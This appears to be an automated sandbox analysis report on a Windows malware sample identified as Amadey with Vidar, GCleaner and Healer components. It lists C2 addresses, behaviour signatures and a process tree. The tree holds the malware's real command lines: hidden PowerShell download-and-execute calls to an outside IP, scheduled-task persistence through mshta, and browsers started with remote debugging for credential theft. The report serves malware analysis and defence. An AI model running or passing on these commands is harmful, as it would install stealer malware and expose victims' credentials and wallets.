Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/02/2025, 13:24

General

  • Target

    97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe

  • Size

    2.1MB

  • MD5

    a3ec4b44e7677c12a76bf51f45480133

  • SHA1

    15587b7a0420115e979461490689a79beca64118

  • SHA256

    97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2

  • SHA512

    4d1dfb16076f0fd17c2d6a0bfe221af69dda9bf7e75f82a13f64e5bd732ff56e7f42b36864b0e07c3ae78bcb459124e700640e03ba0a416121ae7146ea4bf075

  • SSDEEP

    49152:SIp7K7IffJNc+2H/ZL0M/mfnejq0aGhdM6rz8J:r9JNz2BLV+neu0aGLH

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

amadey

Version

5.21

Botnet

a4d2cd

C2

http://cobolrationumelawrtewarms.com

http://�������� jlgenfekjlfnvtgpegkwr.xyz

Attributes
  • install_dir

    a58456755d

  • install_file

    Gxtuum.exe

  • strings_key

    00fadbeacf092dfd58b48ef4ac68f826

  • url_paths

    /3ofn3jf3e2ljk/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 6 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 21 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 17 IoCs
  • Uses browser remote debugging 2 TTPs 13 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 42 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 31 IoCs
  • Identifies Wine through registry keys 2 TTPs 21 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 21 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 49 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 11 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe
    "C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3680
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3652
      • C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
        "C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1728
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 1728 -s 1712
          4⤵
            PID:1028
        • C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
          "C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2672
          • C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
            "C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2532
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2672 -s 796
            4⤵
            • Program crash
            PID:4924
        • C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
          "C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4420
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            4⤵
            • Uses browser remote debugging
            • Enumerates system info in registry
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:3848
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff993bbcc40,0x7ff993bbcc4c,0x7ff993bbcc58
              5⤵
                PID:3268
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1840,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1828 /prefetch:2
                5⤵
                  PID:4444
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2128,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2184 /prefetch:3
                  5⤵
                    PID:3712
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2264 /prefetch:8
                    5⤵
                      PID:1504
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3168 /prefetch:1
                      5⤵
                      • Uses browser remote debugging
                      PID:3904
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3224 /prefetch:1
                      5⤵
                      • Uses browser remote debugging
                      PID:2296
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4528 /prefetch:1
                      5⤵
                      • Uses browser remote debugging
                      PID:4076
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4256 /prefetch:8
                      5⤵
                        PID:2368
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4432,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:8
                        5⤵
                          PID:1028
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4472,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4712 /prefetch:8
                          5⤵
                            PID:3928
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4736,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4944 /prefetch:8
                            5⤵
                              PID:1028
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                            4⤵
                            • Uses browser remote debugging
                            • Enumerates system info in registry
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                            • Suspicious use of FindShellTrayWindow
                            PID:6020
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9988446f8,0x7ff998844708,0x7ff998844718
                              5⤵
                              • Checks processor information in registry
                              • Enumerates system info in registry
                              • Suspicious behavior: EnumeratesProcesses
                              PID:6040
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
                              5⤵
                                PID:4552
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
                                5⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:5192
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3008 /prefetch:8
                                5⤵
                                  PID:3680
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
                                  5⤵
                                  • Uses browser remote debugging
                                  PID:1808
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
                                  5⤵
                                  • Uses browser remote debugging
                                  PID:5448
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4612 /prefetch:1
                                  5⤵
                                  • Uses browser remote debugging
                                  PID:3096
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3980 /prefetch:1
                                  5⤵
                                  • Uses browser remote debugging
                                  PID:5544
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\2n790" & exit
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:2840
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 10
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  • Delays execution with timeout.exe
                                  PID:5672
                            • C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe
                              "C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe"
                              3⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SendNotifyMessage
                              • Suspicious use of WriteProcessMemory
                              PID:720
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c schtasks /create /tn 3U8Dqmawh4D /tr "mshta C:\Users\Admin\AppData\Local\Temp\J7AzTdxv3.hta" /sc minute /mo 25 /ru "Admin" /f
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:4972
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /create /tn 3U8Dqmawh4D /tr "mshta C:\Users\Admin\AppData\Local\Temp\J7AzTdxv3.hta" /sc minute /mo 25 /ru "Admin" /f
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:3724
                              • C:\Windows\SysWOW64\mshta.exe
                                mshta C:\Users\Admin\AppData\Local\Temp\J7AzTdxv3.hta
                                4⤵
                                • Checks computer location settings
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:4108
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                                  5⤵
                                  • Blocklisted process makes network request
                                  • Command and Scripting Interpreter: PowerShell
                                  • Downloads MZ/PE file
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2036
                                  • C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE
                                    "C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE"
                                    6⤵
                                    • Modifies Windows Defender DisableAntiSpyware settings
                                    • Modifies Windows Defender Real-time Protection settings
                                    • Modifies Windows Defender TamperProtection settings
                                    • Modifies Windows Defender notification settings
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Windows security modification
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2244
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" "
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:340
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" any_word
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:1876
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 2
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  • Delays execution with timeout.exe
                                  PID:856
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2012
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    6⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2428
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:5028
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                    6⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:544
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3880
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                    6⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1080
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /create /tn "nLlCHmaz9jk" /tr "mshta \"C:\Temp\f71Q9b6DZ.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:4964
                                • C:\Windows\SysWOW64\mshta.exe
                                  mshta "C:\Temp\f71Q9b6DZ.hta"
                                  5⤵
                                  • Checks computer location settings
                                  • System Location Discovery: System Language Discovery
                                  PID:224
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                    6⤵
                                    • Blocklisted process makes network request
                                    • Command and Scripting Interpreter: PowerShell
                                    • Downloads MZ/PE file
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4504
                                    • C:\Windows\System32\Conhost.exe
                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      7⤵
                                        PID:1080
                                      • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                        7⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Identifies Wine through registry keys
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:5832
                              • C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe
                                "C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe"
                                3⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Drops file in Windows directory
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4416
                                • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
                                  4⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:5268
                              • C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe
                                "C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe"
                                3⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                PID:5264
                              • C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe
                                "C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe"
                                3⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                PID:4928
                                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                  4⤵
                                  • Downloads MZ/PE file
                                  • System Location Discovery: System Language Discovery
                                  PID:6036
                              • C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe
                                "C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe"
                                3⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                PID:4968
                                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                  4⤵
                                  • Downloads MZ/PE file
                                  • System Location Discovery: System Language Discovery
                                  PID:6028
